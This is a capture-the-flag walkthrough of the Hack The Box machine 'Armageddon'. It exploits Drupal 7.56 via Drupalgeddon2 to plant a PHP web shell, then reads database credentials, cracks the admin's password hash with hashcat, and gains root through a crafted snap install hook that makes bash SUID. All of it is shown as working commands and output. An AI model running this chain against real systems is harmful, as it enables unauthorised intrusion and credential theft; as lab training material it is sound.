HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:26 EDT
...
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-title: Welcome to  Armageddon |  Armageddon
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

....
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

Site inspection:

http://10.10.10.233/

$ whatweb http://10.10.10.233

http://10.10.10.233 [200 OK] Apache[2.4.6], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.10.10.233], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.16], PasswordField[pass], PoweredBy[Arnageddon], Script[text/javascript], Title[Welcome to  Armageddon |  Armageddon], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.4.16]

We are facing a Drupal 7 CMS.

$ dirsearch -u http://10.10.10.233/ -i 200

...

Target: http://10.10.10.233/

[10:52:58] Starting: 
[10:53:00] 200 -  317B  - /.editorconfig
[10:53:01] 200 -  174B  - /.gitignore
[10:53:05] 200 -    1KB - /COPYRIGHT.txt
[10:53:05] 200 -  109KB - /CHANGELOG.txt
[10:53:06] 200 -    2KB - /INSTALL.pgsql.txt
[10:53:06] 200 -    2KB - /INSTALL.mysql.txt
[10:53:06] 200 -   18KB - /INSTALL.txt
[10:53:06] 200 -   18KB - /LICENSE.txt
[10:53:06] 200 -    9KB - /MAINTAINERS.txt
[10:53:06] 200 -    5KB - /README.txt
[10:53:07] 200 -   10KB - /UPGRADE.txt
[10:53:34] 200 -   10KB - /includes/
[10:53:34] 200 -    7KB - /index.php
[10:53:35] 200 -    3KB - /install.php
[10:53:37] 200 -  132KB - /includes/bootstrap.inc
[10:53:41] 200 -    9KB - /modules/
[10:53:47] 200 -  278B  - /profiles/testing/testing.info
[10:53:47] 200 -  271B  - /profiles/minimal/minimal.info
[10:53:47] 200 -  743B  - /profiles/standard/standard.info
[10:53:49] 200 -    2KB - /robots.txt
[10:53:49] 200 -    3KB - /scripts/
[10:53:51] 200 -    0B  - /sites/example.sites.php
[10:53:51] 200 -  904B  - /sites/README.txt
[10:53:51] 200 -  151B  - /sites/all/libraries/README.txt
[10:53:51] 200 -    1KB - /sites/all/modules/README.txt
[10:53:51] 200 - 1020B  - /sites/all/themes/README.txt
[10:53:54] 200 -    2KB - /themes/
[10:53:58] 200 -    2KB - /web.config
[10:54:04] 200 -   42B  - /xmlrpc.php

Task Completed

http://10.10.10.233/includes/bootstrap.inc

Specifically, it is a Drupal v7.56.

...
/**
 * The current system version.
 */
define('VERSION', '7.56');
...

Let’s see if this Drupal version has some vulnerability.

CVE-2018-7600
https://github.com/dreadlocked/Drupalgeddon2

$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo MNRXASHW
[+] Result : MNRXASHW
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> 

armageddon.htb>> whoami

apache

armageddon.htb>> pwd

/var/www/html

armageddon.htb>> ls /var/www/html/sites -la

total 12
drwxr-xr-x. 4 apache apache   75 Jun 21  2017 .
drwxr-xr-x. 9 apache apache 4096 May 28 16:46 ..
-rw-r--r--. 1 apache apache  904 Jun 21  2017 README.txt
drwxr-xr-x. 5 apache apache   52 Jun 21  2017 all
dr-xr-xr-x. 3 apache apache   67 Dec  3  2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21  2017 example.sites.php

armageddon.htb>> ls /var/www/html/sites/default -la

total 56
dr-xr-xr-x. 3 apache apache    67 Dec  3  2020 .
drwxr-xr-x. 4 apache apache    75 Jun 21  2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21  2017 default.settings.php
drwxrwxr-x. 3 apache apache    37 Dec  3  2020 files
-r--r--r--. 1 apache apache 26565 Dec  3  2020 settings.php

armageddon.htb>> cat /var/www/html/sites/default/settings.php

...
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...

Mysql password = CQHEy@9M*m23gBVj

armageddon.htb>> whereis mysql

mysql: /usr/bin/mysql /usr/lib64/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gz

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj

armageddon.htb>>

This TTY and/or app not working as expected, so we can try to use -e param to run queries directly.

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'

Database
information_schema
drupal
mysql
performance_schema

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'use drupal; select * from users'

uid	name	pass	mail	theme	signature	signature_format	created	access	login	status	timezone	language	picture	init	data
0						NULL	0	0	0	0	NULL		0		NULL
1	brucetherealadmin	$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt	admin@armageddon.eu			filtered_html	1606998756	1607077194	1607076276	1	Europe/London		0	admin@armageddon.eu	a:1:{s:7:"overlay";i:1;}

We have a Drupal hashed password.

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

$ hashcat -m 7900 drupal.hash /usr/share/wordlists/rockyou.txt

hashcat (v6.2.5) starting

...

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Sat May 28 18:29:24 2022 (2 secs)
Time.Estimated...: Sat May 28 18:29:26 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      176 H/s (9.94ms) @ Accel:32 Loops:1024 Thr:1 Vec:2
Recovered........: 1/1 (100.00%) Digests
Progress.........: 256/14344385 (0.00%)
Rejected.........: 0/256 (0.00%)
Restore.Point....: 192/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
Candidate.Engine.: Device Generator
Candidates.#1....: alyssa -> freedom
Hardware.Mon.#1..: Util: 82%

Started: Sat May 28 18:28:48 2022
Stopped: Sat May 28 18:29:27 2022

so, the password is = booboo

Credentials:
brucetherealadmin:booboo

$ ssh brucetherealadmin@10.10.10.233

The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$

[brucetherealadmin@armageddon ~]$ ls

user.txt

[brucetherealadmin@armageddon ~]$ cat user.txt

ede8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now let’s get our’s root flag.

[brucetherealadmin@armageddon ~]$ sudo -l

Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

We can use snap install as root.

According to https://gtfobins.github.io/gtfobins/snap/ we can use nmap to run commands.

COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode

First, we need to install fpm (if not previously installed).
https://github.com/jordansissel/fpm

$ sudo gem install fpm

[brucetherealadmin@armageddon ~]$ cp /usr/bin/bash .
[brucetherealadmin@armageddon ~]$ ls -la

total 960
drwx------. 2 brucetherealadmin brucetherealadmin    111 may 29 10:02 .
drwxr-xr-x. 3 root              root                  31 dic  3  2020 ..
-rwxr-xr-x. 1 brucetherealadmin brucetherealadmin 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root              root                   9 dic 11  2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin     18 abr  1  2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    193 abr  1  2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    231 abr  1  2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin     33 may 28 16:33 user.txt

Now we create a new snap package that will be uploaded to the box.

$ COMMAND="chown root:root /home/brucetherealadmin/bash;chmod 4755 /home/brucetherealadmin/bash" 
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n aaa -s dir -t snap -a all meta 

Created package {:path=>"aaa_1.0_all.snap"}

This package will set the bash we copied into bruce’s directory to have the SUID permission.

$ sudo python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.233 - - [29/May/2022 11:15:15] "GET /aaa_1.0_all.snap HTTP/1.1" 200 -

[brucetherealadmin@armageddon ~]$ curl http://10.10.14.31:8000/aaa_1.0_all.snap -o aaa.snap

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4096  100  4096    0     0  46520      0 --:--:-- --:--:-- --:--:-- 

[brucetherealadmin@armageddon ~]$ sudo snap install aaa.snap --dangerous --devmode

error: cannot perform the following tasks:
- Run install hook of "aaa" snap if present (run hook "install": exit status 1)

[brucetherealadmin@armageddon ~]$ ls -la

total 964
drwx------. 2 brucetherealadmin brucetherealadmin    127 may 29 10:15 .
drwxr-xr-x. 3 root              root                  31 dic  3  2020 ..
-rw-rw-r--. 1 brucetherealadmin brucetherealadmin   4096 may 29 10:15 aaa.snap
-rwsr-xr-x. 1 root              root              964536 may 29 10:02 bash
lrwxrwxrwx. 1 root              root                   9 dic 11  2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin     18 abr  1  2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    193 abr  1  2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    231 abr  1  2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin     33 may 28 16:33 user.txt

[brucetherealadmin@armageddon ~]$ ./bash -p

bash-4.2#

-p parameter will turn on privileged mode.
https://linux.die.net/man/1/bash

bash-4.2# cd /root/
bash-4.2# ls

anaconda-ks.cfg  cleanup.sh  passwd  reset.sh  root.txt  snap

bash-4.2# cat root.txt

a2e8XXXXXXXXXXXXXXXXXXXXXXXXXXXX